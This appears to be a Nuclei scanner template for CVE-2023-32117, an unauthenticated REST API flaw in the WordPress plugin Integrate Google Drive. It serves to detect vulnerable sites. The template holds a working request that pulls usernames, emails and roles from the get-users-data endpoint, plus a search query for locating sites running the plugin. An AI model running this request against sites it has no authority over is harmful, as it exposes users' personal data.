id: CVE-2023-32117 info: name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints author: DhiyaneshDK severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2023-32117 metadata: max-request: 1 publicwww-query: "/wp-content/plugins/integrate-google-drive/" verified: true tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive http: - method: POST path: - "{{BaseURL}}/wp-json/igd/v1/get-users-data" matchers-condition: and matchers: - type: word part: body words: - '"username":' - '"name":' - '"email":' - '"role":' condition: and - type: word part: header words: - 'application/json' - type: status status: - 200